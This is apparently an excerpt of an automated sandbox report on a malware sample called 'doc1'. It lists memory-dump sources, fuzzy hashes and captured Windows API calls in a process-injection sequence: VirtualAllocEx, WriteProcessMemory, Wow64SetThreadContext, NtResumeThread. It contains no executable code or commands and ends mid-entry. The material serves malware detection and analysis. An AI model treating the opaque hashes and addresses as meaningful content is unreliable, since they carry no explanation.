                            control_flow_graph 1355 57fc0a0-57fc16d NtProtectVirtualMemory 1359 57fc16f-57fc175 1355->1359 1360 57fc176-57fc1c0 1355->1360 1359->1360
                            APIs
                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 057FC15D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: a8c01e7781b9952f34f72bb115a29d7a4f88cc080e0c3e92b156aca47a34f2d2
                            • Instruction ID: b556a7ae22b411b7ed1a9aaa9c619199a6c979b45954585a546db1fab8439171
                            • Opcode Fuzzy Hash: a8c01e7781b9952f34f72bb115a29d7a4f88cc080e0c3e92b156aca47a34f2d2
                            • Instruction Fuzzy Hash: 1D4197B4D042589FDF10CFAAD880A9EFBB1BB49310F10942AE918B7300D735A902CF68

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1365 57fc0a8-57fc16d NtProtectVirtualMemory 1369 57fc16f-57fc175 1365->1369 1370 57fc176-57fc1c0 1365->1370 1369->1370
                            APIs
                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 057FC15D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: cc112549b073c1443212cdc47ce3995352de0251bcaf0685a79d49f123cd0ac4
                            • Instruction ID: a3a1b0e36e6e53be726a7e5976403d7d5339b9fa6b0a797b0b59c9c0e9462123
                            • Opcode Fuzzy Hash: cc112549b073c1443212cdc47ce3995352de0251bcaf0685a79d49f123cd0ac4
                            • Instruction Fuzzy Hash: 6A4186B8D042589FDF10CFAAD980A9EFBB5BB49310F10942AE919B7300D735A905CF68
                            APIs
                            • NtResumeThread.NTDLL(?,?), ref: 057FD62E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: f1644465376dbefe0aad6a17d6bb56c5bbe65e75b27a5bb154ef3f2e224fc13a
                            • Instruction ID: abea903a323daca80a2176fee06ad24bc9af761cde8a600127312bafc0f1c490
                            • Opcode Fuzzy Hash: f1644465376dbefe0aad6a17d6bb56c5bbe65e75b27a5bb154ef3f2e224fc13a
                            • Instruction Fuzzy Hash: A031AAB4D05218DFDB10CFA9D980A9EFBF1BB49310F20942AE919B7300C775A906CF94
                            APIs
                            • NtResumeThread.NTDLL(?,?), ref: 057FD62E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 8c5b7b944b22dc5a37e54885efa9a9e12ea7b9516ca3fc0a1b61b25506bbec3e
                            • Instruction ID: 8c916bdf9b79f0fe778f6efce234b220cc3ac569a88641fcc1651eb0c82e259b
                            • Opcode Fuzzy Hash: 8c5b7b944b22dc5a37e54885efa9a9e12ea7b9516ca3fc0a1b61b25506bbec3e
                            • Instruction Fuzzy Hash: 9A31AAB4D05218DFDB10CFA9D980A9EFBF5BB49310F10942AE919B7300C775A905CF94
                            APIs
                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 057FC15D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: 1e72e8756e07a49ba0168245c6c1a3ad4ee7313b798f4b95c0ee7bb4eea79371
                            • Instruction ID: 29a30bd7dc45212a632ffb68aab1dbd4f502897401287b733d3f562ec653e459
                            • Opcode Fuzzy Hash: 1e72e8756e07a49ba0168245c6c1a3ad4ee7313b798f4b95c0ee7bb4eea79371
                            • Instruction Fuzzy Hash: 7C1167B6C14308EFDB11EBA8E845BCDFBB8AB94320F14841AE519A7390D7346851CB25
                            APIs
                            • NtResumeThread.NTDLL(?,?), ref: 057FD62E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 15eebbdf2cbcd208a169dd1cbfe4362f7934af56703d27f0121de26c73be99ad
                            • Instruction ID: f086d503592a1618aef09323124154719aa08be6dec1bd201abbfa47fe5f1d19
                            • Opcode Fuzzy Hash: 15eebbdf2cbcd208a169dd1cbfe4362f7934af56703d27f0121de26c73be99ad
                            • Instruction Fuzzy Hash: 9C1100B6D06218DFDB20DFA8E854BDDFBF0AB99310F14406AE508A7390D7745C06CB61
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 0975f0b0006fa0901ee6d7935c10e11f92b40ad27e0c6e36c42bc3f4cce50010
                            • Instruction ID: 1f04a7b7af9ecf84e7e51b7398cd6a47f8aa42e30e602cd08166a36a06ff323e
                            • Opcode Fuzzy Hash: 0975f0b0006fa0901ee6d7935c10e11f92b40ad27e0c6e36c42bc3f4cce50010
                            • Instruction Fuzzy Hash: B1C1E4B4A05218CFDB54CF69C958BEDBBF6AB89304F1080AAD809B7291DB745E85CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 48c4ca109b4915ed3aa798f60b169e3772d6e75e539fcf8c26ecb428b2fe1e0d
                            • Instruction ID: 9e14665fe858614aa8e7dbd36c4eff75ab68233b80b60b86b47256de841be5c2
                            • Opcode Fuzzy Hash: 48c4ca109b4915ed3aa798f60b169e3772d6e75e539fcf8c26ecb428b2fe1e0d
                            • Instruction Fuzzy Hash: A3C1E5B4A05218CFEB54DF65C958BEDBBF6BB89304F1080AAD809B7291DB745E85CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 3002b57a0c79ff6737958db0cb182a548885c81d5b0a313b8fe2c16028851d37
                            • Instruction ID: a3e3ff33fbec11febbaad1a0c0c9c8b585fb0e6ceadff1f354f3ce25c8c188fb
                            • Opcode Fuzzy Hash: 3002b57a0c79ff6737958db0cb182a548885c81d5b0a313b8fe2c16028851d37
                            • Instruction Fuzzy Hash: 00C1F4B4E06218CFEB14DF69D954BADBBBAFB89304F1090A9D809A7394DB305D85CF05
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 7a07fb98a45cd979e9122b65ffd0e4e055251bf56667f1e44a2d1095bcfdd8b4
                            • Instruction ID: 5d995ef0249793839eacea71e831c7b92c638b62cab18b0145463478d70f30cd
                            • Opcode Fuzzy Hash: 7a07fb98a45cd979e9122b65ffd0e4e055251bf56667f1e44a2d1095bcfdd8b4
                            • Instruction Fuzzy Hash: 49C1E3B4E06218CFEB14DF69D954BADB7BAFB89304F1090A9D809A7394DB305D85CF05
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 3a2a19b399330d8b6e6af8d0bb696b8b92dbdce4b0794eb2b247449ae5f15c0d
                            • Instruction ID: 72b163b8e6600a38ca8089d386104ec2f836436770f03ac20f8d92c6a55a6148
                            • Opcode Fuzzy Hash: 3a2a19b399330d8b6e6af8d0bb696b8b92dbdce4b0794eb2b247449ae5f15c0d
                            • Instruction Fuzzy Hash: 84C1D2B4A05218CFDB54DF64D958BEDBBF6FB89304F1080AAD809AB291DB345E85CF05
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 5a88a83c01710eaa6a720c2e8d862d49bbf30bb640f74e47c18e5d156bfb4962
                            • Instruction ID: 0ebc0726be54784a3bdf06a3f6820e8ccf6d8eeefc978f445ab51667765d6e6e
                            • Opcode Fuzzy Hash: 5a88a83c01710eaa6a720c2e8d862d49bbf30bb640f74e47c18e5d156bfb4962
                            • Instruction Fuzzy Hash: 4EB1D4B4905308CFDB54DFA4D858BEDBBF6AB89304F1080AAD809AB291DB345E85CF15
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 97685dde4ed37da54fa8120d057953164d259bb000087c741d5134078c18b001
                            • Instruction ID: 9c4e7ee80f7482db1c244bab2503e1ffc99112d588ab08f214fc8a63ef327f70
                            • Opcode Fuzzy Hash: 97685dde4ed37da54fa8120d057953164d259bb000087c741d5134078c18b001
                            • Instruction Fuzzy Hash: 7EB1D3B4A05208CFDB54DFA4D958BEDBBF6BB89304F1080AAD809B7291DB745E85CF05
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: I9$+
                            • API String ID: 0-2981498450
                            • Opcode ID: 38a3a550979f608015daeb4537848d78b04ac43439f47c54bab7ffbedf20f6b5
                            • Instruction ID: 01187457c7ef9abefec88bc32060ef8dbeb8c021835fb5630cc9df2a6b80795b
                            • Opcode Fuzzy Hash: 38a3a550979f608015daeb4537848d78b04ac43439f47c54bab7ffbedf20f6b5
                            • Instruction Fuzzy Hash: C8A1C0B4E05208DFDB14CFA9D485BADBBF6FB89304F10806AD819E7295DB746985CF08
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: I9$+
                            • API String ID: 0-2981498450
                            • Opcode ID: 19f76e8b1d0241bbfd6a09c14d648266e162561731ef967bc44d92d57c57d187
                            • Instruction ID: 2a4636382ebff62fe0da993968d77cd67ef786c833b982f1e000e8ddf59935d0
                            • Opcode Fuzzy Hash: 19f76e8b1d0241bbfd6a09c14d648266e162561731ef967bc44d92d57c57d187
                            • Instruction Fuzzy Hash: 1DA1D0B4E05208DFDB14CFA9D485BADBBF6FB89304F10806AD809E7255DB746985CF08
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 420a6c09e0c0e1f7655b3b5981f87e92af85ed97086f5e2db949ef4a6af96ddd
                            • Instruction ID: 800d00dfab6e6d9d827933a7e50fab8a252ce4cfb8becd8a1812a7999cea4e58
                            • Opcode Fuzzy Hash: 420a6c09e0c0e1f7655b3b5981f87e92af85ed97086f5e2db949ef4a6af96ddd
                            • Instruction Fuzzy Hash: 30A1F474A01258DFEF54DFA4D894BADBBF2FB89300F1090A9D509AB395DB345985CF01
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 48fa897f34ade6e1e1750ef63f25f8701647add8e4b0916819006a01a8e78364
                            • Instruction ID: 37e2457535fa4edcd1d550577f2391c094192272e04d44a91d07eddacfec3f1c
                            • Opcode Fuzzy Hash: 48fa897f34ade6e1e1750ef63f25f8701647add8e4b0916819006a01a8e78364
                            • Instruction Fuzzy Hash: 0B626874B007159FCB18DF69C498B6EBBF2FF88300F248529D65A97782DB30A941DB90
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a95451ae8133ad93218dba5de8703f6639aa4c20009c2f14e7961339b15f680f
                            • Instruction ID: 8d5cfadde19485c28adaae93a2ba5c4e029f31719a423f7f4c4b90e4137cf84c
                            • Opcode Fuzzy Hash: a95451ae8133ad93218dba5de8703f6639aa4c20009c2f14e7961339b15f680f

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: :$W${
                            • API String ID: 0-1563369076
                            • Opcode ID: f4994550f0da36e4922c7f9d6f9cb5868c6c89d2de8c9509fa1eb43b2cc3aec3
                            • Instruction ID: c747325be5fc882f156822567821e2e5896ec8023958118d86024402ed2877bf
                            • Opcode Fuzzy Hash: f4994550f0da36e4922c7f9d6f9cb5868c6c89d2de8c9509fa1eb43b2cc3aec3
                            • Instruction Fuzzy Hash: 70111330806219CFDB29CFA4C98C7DCBBB1BB09314F6411EAC809B3281C7784A85DF11

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: )$.$>
                            • API String ID: 0-670635494
                            • Opcode ID: bed750559c2bf924ed0a2055a90adbefc8a52bcd6dd2858a22397395e123897c
                            • Instruction ID: 2c6b8183166ee9a9b6e7e8e6827567c95d9b2db506d816c985cf0f6291411d8a
                            • Opcode Fuzzy Hash: bed750559c2bf924ed0a2055a90adbefc8a52bcd6dd2858a22397395e123897c
                            • Instruction Fuzzy Hash: 571115B59012698FEB68CF60D894BECB7B5BF45300F5080DAC80EA7280CB349E85CF44

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: <$E$
                            • API String ID: 0-763103881
                            • Opcode ID: 22165434bf5e1ae08472776306d4a7cc44c94c47041a8355373f8690d6d80073
                            • Instruction ID: 2a68769976de88259f72004efec4e066026c6486cf18de28d7c418cac1a04dad
                            • Opcode Fuzzy Hash: 22165434bf5e1ae08472776306d4a7cc44c94c47041a8355373f8690d6d80073
                            • Instruction Fuzzy Hash: BE01007190425ADBCB61CF68C884BD9B7B5FB44300F108695E80DA7290CB31AAC5CF44
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: C{m^$D{m^
                            • API String ID: 0-148523534
                            • Opcode ID: a8c0c7d5eda051f3e890d874d8c128168ca062bd99c6fe9802a1ce546daa495c
                            • Instruction ID: 4819eb49c81ae19288b9a2842a7759caf3e5f43846d63d68b86847c7e6069106
                            • Opcode Fuzzy Hash: a8c0c7d5eda051f3e890d874d8c128168ca062bd99c6fe9802a1ce546daa495c
                            • Instruction Fuzzy Hash: 142204756093908FCB17AF7CD864BA97F75BF4A314F0940DAD0859B293DA308C49DBA2

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: /$
                            • API String ID: 0-2097186568
                            • Opcode ID: 4998be9bd5996891e8751e821b86d1ba62a605b6119bf907924fc954fb1e72bc
                            • Instruction ID: 5267521940a5d439d8fbf3be4a40236ac312d83f1d395170c395229051161d0c
                            • Opcode Fuzzy Hash: 4998be9bd5996891e8751e821b86d1ba62a605b6119bf907924fc954fb1e72bc
                            • Instruction Fuzzy Hash: D3310678A042288FCB64DF68C888ADAB7F6FB89340F1041E9E419A7394C7309EC5CF41

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: +$=
                            • API String ID: 0-1658445220
                            • Opcode ID: 8548d1db3eed6ed2e5139a1af695ce97bc4ecee29d01df4b412692e1672ae374
                            • Instruction ID: 0e8eb389602ba33c4f02f7c1c2b5bffb1ad5a3d02832791b217ad96afc34091f
                            • Opcode Fuzzy Hash: 8548d1db3eed6ed2e5139a1af695ce97bc4ecee29d01df4b412692e1672ae374
                            • Instruction Fuzzy Hash: 8A115DB4906228CFDB65CF28D988BECBBB5BB09344F0080DAE949A6290D7755ED4CF44

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: W${
                            • API String ID: 0-2693638197
                            • Opcode ID: 70656d1417713e1c1e538a2910373dabcacf0b363b37a9f57cd35387e04ce43c
                            • Instruction ID: 8d21299cd22a3af380083878da7656fbe805b5d5ddc712f5b36dbd8ad1006e61
                            • Opcode Fuzzy Hash: 70656d1417713e1c1e538a2910373dabcacf0b363b37a9f57cd35387e04ce43c
                            • Instruction Fuzzy Hash: 3DF0AF70916229CFDB25DF64D988BDDBBB2BB09311F6451D9D408B6240C7389BC5DF11

                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057FCB77
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 55c5287c46bfc4774f95558a62f195a7ab105381c032fff15fb9c0587c50648b
                            • Instruction ID: 6583b59c5bce26848446c512221ad6c436b35b17e161a800e42d70158ad74c87
                            • Opcode Fuzzy Hash: 55c5287c46bfc4774f95558a62f195a7ab105381c032fff15fb9c0587c50648b
                            • Instruction Fuzzy Hash: D0A121B0D0821CCFDB11CFA9C885BEEBBB5BB49304F10916AE959A7380DB349981DF55

                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057FCB77
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: eff3309a39c644bc95ae4a803f8e2f3e695cadf93f68f152c9910b09c713f75a
                            • Instruction ID: 412449a9f4fc024ed7385c79aeb7b414a9dcaf758e09b8eac7896ab812c8d12e
                            • Opcode Fuzzy Hash: eff3309a39c644bc95ae4a803f8e2f3e695cadf93f68f152c9910b09c713f75a
                            • Instruction Fuzzy Hash: D4A120B0D0821CCFDB11CFA9C885BEEBBB5BB09304F10916AE959A7340DB349985DF95

                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057FD45B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 42102d5490e4b25524bdb1d8cd09e6c5ef3ecb22e7edb397141c51cbad0f2a57
                            • Instruction ID: dbd23dd53d39212ca23199cefa117b2de08f65bea812d255c28a0c9aced03350
                            • Opcode Fuzzy Hash: 42102d5490e4b25524bdb1d8cd09e6c5ef3ecb22e7edb397141c51cbad0f2a57
                            • Instruction Fuzzy Hash: 2741ABB5D012589FDF10CFA9D984AEEFBF1BB49310F14902AE818BB200D734AA45DF64

                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057FD45B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: d25d504d3ca7e5b403df879e2c3015364c20500b69499249019c9bce37679391
                            • Instruction ID: 82cd66c84cbcc21c1b027c485f2ba00cbdc2ecab8887036fe49d9f00f7579b68
                            • Opcode Fuzzy Hash: d25d504d3ca7e5b403df879e2c3015364c20500b69499249019c9bce37679391
                            • Instruction Fuzzy Hash: E5419BB5D012589FDF10CFA9D984AEEFBF1BB49310F14902AE919B7200D735A945CB64

                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057FD2D2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 947b426cf4b07bb4375ecf61cbe97be63cf21b3370dea48481a9ec1c530ba529
                            • Instruction ID: 8edc231e1778b81d5ab219af59414695cdad059cc06721d1a0ca3ccc536c2407
                            • Opcode Fuzzy Hash: 947b426cf4b07bb4375ecf61cbe97be63cf21b3370dea48481a9ec1c530ba529
                            • Instruction Fuzzy Hash: 8E4197B9D04258EFDF10CFA9D980A9EBBB1BF49310F10942AE915B7310D735A902CF69
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057FD2D2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: cd3508a7b2348462b68825fda45b27238ed40df36dc66a55c8ba2229c9b69197
                            • Instruction ID: 522c8668ead1170a45f491c959477ee7ad72ac5ffef3479f8905453d6fb6b616
                            • Opcode Fuzzy Hash: cd3508a7b2348462b68825fda45b27238ed40df36dc66a55c8ba2229c9b69197
                            • Instruction Fuzzy Hash: 8D3185B9D04258DFDF10CFA9D980A9EFBB5BB49310F10A42AE915B7310D735A906CF68
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 057FD91C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: c3c95677263763b44b14814c6f22e3df45b990f227666229e0c5fc175beba4c2
                            • Instruction ID: 81c89b41dde005310d494a401a6e188e170af4cb908fe8b17fdc09531f325515
                            • Opcode Fuzzy Hash: c3c95677263763b44b14814c6f22e3df45b990f227666229e0c5fc175beba4c2
                            • Instruction Fuzzy Hash: B431B9B5D05258AFDF10CFAAD884AEEFBB1BB49310F14942AE815B7210C735A945CF68
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 057FD91C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: f7b64a250b13e263e4e958bcd362337ae1280ba2d755ce6b788ca3429fb22a44
                            • Instruction ID: f9c48f085bbea1217421f0792543154b5c518bdc73ac606aadf3ac71db6a6b66
                            • Opcode Fuzzy Hash: f7b64a250b13e263e4e958bcd362337ae1280ba2d755ce6b788ca3429fb22a44
                            • Instruction Fuzzy Hash: 9331B9B4D052589FDF10CFA9D884AEEFBB1BB49310F14902AE815B7210C735A945CF58
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0580D534
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304289784.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5800000_doc1.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 1e0e6cfafdd90e37e321c29c40e1529403da77cab6487d43a1ae3fe301e4a1c4
                            • Instruction ID: 178dcb88342a4da142c7ce4743aa05b8e16ce8c79b2c125b130f70e0011771e1
                            • Opcode Fuzzy Hash: 1e0e6cfafdd90e37e321c29c40e1529403da77cab6487d43a1ae3fe301e4a1c4
                            • Instruction Fuzzy Hash: 5E31A7B9D01248EFDF10CFA9D980AAEFBB1BF49310F20902AE815B7210D735A945CF58
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 057FCD77
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: ef1519291ed8351a626ff5191386acbfe02a7db2940a471200d19821c74dddb7
